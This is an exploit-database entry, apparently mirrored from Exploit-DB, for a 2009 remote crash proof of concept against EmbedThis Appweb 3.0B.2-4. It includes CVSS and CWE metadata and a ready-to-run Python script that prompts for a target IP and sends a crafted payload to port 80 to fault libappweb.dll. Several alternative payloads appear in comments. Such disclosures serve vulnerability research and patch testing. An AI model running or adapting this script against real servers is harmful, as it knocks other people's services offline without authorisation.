EmbedThis Appweb v3.0B.2-4 Multiple Remote Buffer Overflow PoCs

vendor:

Appweb

by:

Dr_IDE

7,5

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: Appweb

Affected Version From: 3.0B.2-4

Affected Version To: 3.0B.2-4

Patch Exists: Yes

Related CWE: N/A

CPE: a:embedthis:appweb:3.0b.2-4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2009

EmbedThis Appweb v3.0B.2-4 Multiple Remote Buffer Overflow PoCs

This exploit is based on a vulnerability in EmbedThis Appweb v3.0B.2-4, which allows a remote attacker to cause a buffer overflow by sending a specially crafted payload to the server. This payload can be sent using a socket connection, and will cause a fault in libappweb.dll.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python
############################################################################
# 
# EmbedThis Appweb v3.0B.2-4 Multiple Remote Buffer Overflow PoCs
# Found By: Dr_IDE
# Based On: http://www.milw0rm.com/exploits/9411
# Tested On: XP SP2
# Notes: These don't seem to actually take down the server, they cause
# a fault in libappweb.dll.
#
############################################################################

from socket import *

# Seems like the server really doesn't like talking to us...
# Anything you send seems to elicit the same crash from the server.

#payload = ("\x41" * 10000 + " HTTP/1.1\r\n\r\n")
#payload = "HEAD HTTP/1.1\r\n\r\n"
#payload = "GET HTTP/1.1\r\n\r\n"
#payload = "GET \r\n\r\n"
#payload = "HEAD \r\n\r\n"
payload = "\r\n\r\n"

ip = raw_input(" [*] Enter the target IP: ")
s = socket(AF_INET, SOCK_STREAM)
s.connect((ip, 80))

print " [*] Connecting to Target."
s.send(payload)
print " [*] Sending \"payload\"..."
print " [*] Crash will pop up in a few seconds."
s.close()
raw_input(" [*] Done, press enter to quit")

# milw0rm.com [2009-08-13]